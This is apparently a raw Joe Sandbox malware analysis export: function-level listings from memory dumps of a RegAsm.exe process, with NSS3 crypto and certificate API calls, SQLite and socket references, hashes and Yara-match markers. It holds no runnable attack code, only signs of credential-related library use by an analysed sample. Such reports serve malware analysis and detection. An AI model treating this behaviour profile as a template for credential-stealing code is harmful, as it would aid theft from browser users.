                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: 64dc460cdf06c9ac7a14d8c7778a5ebb98fe5de974948cf1c2bd6268dd964817
                                                                                                                                                                                                                                                                  • Instruction ID: 1a54fd8b00baf2b2e914315b594ceaa609dc65151eaa4477a5ed4db55256655b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64dc460cdf06c9ac7a14d8c7778a5ebb98fe5de974948cf1c2bd6268dd964817
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C310671E043299BC720CF9DC9809BEB7F2BF44345B5949AAE844B7B85D271E851C7B0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C8A6D36
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • database corruption, xrefs: 6C8A6D2A
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C8A6D2F
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8A6D20
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: be7300625078fff3916dfad94f6982fed7af0e56c0f56f8017d39abc535bf911
                                                                                                                                                                                                                                                                  • Instruction ID: 4b33e74a8d73952baa1f15fc11e52287423b5446e2fa13fbb5a76ab6311a513d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be7300625078fff3916dfad94f6982fed7af0e56c0f56f8017d39abc535bf911
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B2102306003059BC3208E5DCA41B5AB7F2BF80349F148D2CD84AABF55E372F94687A2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C9DCC7B), ref: 6C9DCD7A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C9DCD8E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C9DCDA5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C9DCDB8
                                                                                                                                                                                                                                                                  • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C9DCCB5
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(6CA714F4,6CA702AC,00000090), ref: 6C9DCCD3
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(6CA71588,6CA702AC,00000090), ref: 6C9DCD2B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8F9AC0: socket.WSOCK32(?,00000017,6C8F99BE), ref: 6C8F9AE6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8F9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8F99BE), ref: 6C8F9AFC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C900590: closesocket.WSOCK32(6C8F9A8F,?,?,6C8F9A8F,00000000), ref: 6C900597
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                  • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                  • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                  • Opcode ID: 02048f4653853a9f9ce99584df64dcf7f9502850713d7be9d9f3ad8c8e315e75
                                                                                                                                                                                                                                                                  • Instruction ID: 19e024a4d8fd6c8aea3c2b4e2c79a081a882536b859197bde4fdfd2fe8a28638
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02048f4653853a9f9ce99584df64dcf7f9502850713d7be9d9f3ad8c8e315e75
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11C3F9B003715EDB198F6D9817B623AF8B316218F089129E70DDBB40E635C48647F1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_Initialize), ref: 6C941CD8
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C941CF1
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_Now.NSS3 ref: 6CA20A22
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA20A35
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA20A66
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_GetCurrentThread.NSS3 ref: 6CA20A70
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA20A9D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA20AC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsmprintf.NSS3(?,?), ref: 6CA20AE8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20B19
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20B48
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20C76
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_LogFlush.NSS3 ref: 6CA20C7E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                                                                                                                                                                                                  • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                                                                                                                                                                                                  • API String ID: 1907330108-3943720641
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411090,00000000,?,00000000,?), ref: 00410C9D
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00411090,00000000,?,00000000,?), ref: 00410CA4
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00410CB5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                  • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000,?,6C981289,?), ref: 6C982D72
                                                                                                                                                                                                                                                                    • Part of subcall function 6C983390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C982CA7,E80C76FF,?,6C981289,?), ref: 6C9833E9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C983390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C98342E
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C981289,?), ref: 6C982D61
                                                                                                                                                                                                                                                                    • Part of subcall function 6C980B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C980B21
                                                                                                                                                                                                                                                                    • Part of subcall function 6C980B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C980B64
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C981289,?), ref: 6C982D88
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C981289,?), ref: 6C982DAF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: PR_CallOnceWithArg.NSS3(6CA72178,6C93BCF0,?), ref: 6C93B915
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C93B933
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C93B9C8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C93B9E1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C980A50: SECOID_GetAlgorithmTag_Util.NSS3(6C982A90,E8571076,?,6C982A7C,6C9821F1,?,?,?,00000000,00000000,?,?,6C9821DD,00000000), ref: 6C980A66
                                                                                                                                                                                                                                                                    • Part of subcall function 6C983310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C982D1E,?,?,?,?,00000000,?,?,?,?,?,6C981289), ref: 6C983348
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9806F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C982E70,00000000), ref: 6C980701
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2288138528-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C916C8D
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C916CA9
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C916CC0
                                                                                                                                                                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CA38FE0), ref: 6C916CFE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5baf8dd862cf0337621d920a2a210c8d5695710a69952acf9b704c26a24a69bb
                                                                                                                                                                                                                                                                  • Instruction ID: 51258ad5a84a189b5665bfd68484339cf63f6d5d05f4abe94db34c2219221c8b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5baf8dd862cf0337621d920a2a210c8d5695710a69952acf9b704c26a24a69bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 893170B5E0521A9FDB04CF65C852ABFBBF9EB55248B10442DD905D7B40EB31D905CBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strtok_s$H_prolog
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1158113254-0
                                                                                                                                                                                                                                                                  • Opcode ID: 41f4a85633314238a50996da74d7f340be29094ab8e387c842f218635180a804
                                                                                                                                                                                                                                                                  • Instruction ID: 0f016b6c19d62f4a383ec4c208f60cc7245461e1a48e41b796f339672d39a54f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41f4a85633314238a50996da74d7f340be29094ab8e387c842f218635180a804
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66210571600505AFCB18EF60C9D1EEBB3ACEF14314B10803FE617D6991EB38E986C654
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411634
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041165B
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426554,00000001,?,?,?,00416ED4), ref: 00411697
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004116D3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strtok_s$H_prologlstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 539094379-0
                                                                                                                                                                                                                                                                  • Opcode ID: d2738cfee78ca2e6f5de626fb3f7c02bc618f1e3490a7e38134044452132fd70
                                                                                                                                                                                                                                                                  • Instruction ID: 2243f29b9414ee3a0905d1ffd7d22fb608f81ec071414b529d828bb519633361
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2738cfee78ca2e6f5de626fb3f7c02bc618f1e3490a7e38134044452132fd70
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4221D371600505ABCB14DFA5C981FEF73ACEF04314F14413FE516E65A1EB38EA858A69
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000004), ref: 6C990C43
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: TlsGetValue.KERNEL32 ref: 6C93DF37
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: EnterCriticalSection.KERNEL32(?), ref: 6C93DF4B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C93E02B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: PR_Unlock.NSS3(?), ref: 6C93E07E
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000008), ref: 6C990C85
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,?), ref: 6C990C9F
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C990CB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3186484790-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89c726c438febee19cafaa20c925acc2bdc3eb78823e450f8cbe980564cecb39
                                                                                                                                                                                                                                                                  • Instruction ID: 28a76e00829c8f28eb27799a7767156dc5b904a2caf24ee9f7a3c74033222728
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89c726c438febee19cafaa20c925acc2bdc3eb78823e450f8cbe980564cecb39
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 612128715042869FCB01CB68DC15B9BBFA8AF35204F0EC1A9E8585F752E731D828C7E2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CERT_NewCertList.NSS3 ref: 6C93ACC2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C912F0A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C912F1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C910A1B,00000000), ref: 6C912AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C912B11
                                                                                                                                                                                                                                                                  • CERT_DestroyCertList.NSS3(00000000), ref: 6C93AD5E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C91B41E,00000000,00000000,?,00000000,?,6C91B41E,00000000,00000000,00000001,?), ref: 6C9557E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C955843
                                                                                                                                                                                                                                                                  • CERT_DestroyCertList.NSS3(?), ref: 6C93AD36
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F50: CERT_DestroyCertificate.NSS3(?), ref: 6C912F65
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C912F83
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C93AD4F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 132756963-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C963C9E
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C963CAE
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C963CEA
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C963D02
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 284873373-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C96F0AD,6C96F150,?,6C96F150,?,?,?), ref: 6C96ECBA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9187ED,00000800,6C90EF74,00000000), ref: 6C971000
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970FF0: PR_NewLock.NSS3(?,00000800,6C90EF74,00000000), ref: 6C971016
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970FF0: PL_InitArenaPool.NSS3(00000000,security,6C9187ED,00000008,?,00000800,6C90EF74,00000000), ref: 6C97102B
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C96ECD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C96ED02
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97116E
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C96ED5A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C9A5F17,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BAC94
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C9A5F17,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACA6
                                                                                                                                                                                                                                                                  • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACC0
                                                                                                                                                                                                                                                                  • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACDB
                                                                                                                                                                                                                                                                  Memory Dump Source
